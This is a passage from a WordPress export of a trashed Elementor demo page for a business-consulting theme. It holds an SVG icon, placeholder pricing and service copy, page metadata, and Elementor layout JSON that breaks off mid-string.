		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
			<h4>Progress Bars</h4>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h4>Pricing Tables</h4>		
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
			<h4>Flip Boxes</h4>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
			<h4>Service Boxes</h4>		
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="#">Explore More</a>	    
			<a href="#"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="#">Explore More</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>624</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 06:56:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 06:56:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[elements__trashed]]></wp:post_name>
		<wp:status><![CDATA[trash]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[625]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8e54f4f","elType":"section","settings":{"padding":{"unit":"px","top":"85","right":"0","bottom":"90","left":"0","isLinked":false}},"elements":[{"id":"d69842b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"374421e","elType":"widget","settings":{"title":"Icon Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2ece61d","elType":"widget","settings":{"icon_boxes":[{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"b6775b1"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"21732ff"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":638},"library":"svg"},"title":"Consumer Products","des":"Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"e1d2100"}],"icon_size":{"unit":"px","size":48,"sizes":[]},"align":"left","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox_grid"},{"id":"9df710a","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1178550","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2ba221f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e256b55","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"aae9912","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":42,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9736423","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"740d57b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"42a0f44","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"1ed1cd4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"af68c9c","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"9f24e04","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"db8197f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"6d55426","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"6c42f1a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"ccfedc3","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"cd58237","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5bc1f0b","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"b140664","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ab511b8","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve beven a strategy thought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"29f766a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ad7d79d","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy tmhought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"3bd1a3a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"5ff8069","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":36,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"0422c24","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4893536","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"6a60a09","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Audit and Assurance","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_size":{"unit":"px","size":43,"sizes":[]},"icon_color":"#FFFFFF","icon_bg":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9089712","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"ea9b75f","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Gross Tax Planning","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#D92300","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"4c25bc2","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"596b78b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"698ffdc","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"eb94e32","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"be4a619","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"\u041erganizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"bbe4b35","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8c33540","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"82fa562","elType":"widget","settings":{"title":"Progress Bars","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"37788eb","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5249351","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a17e202","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"7213754","elType":"widget","settings":{"title":"finance 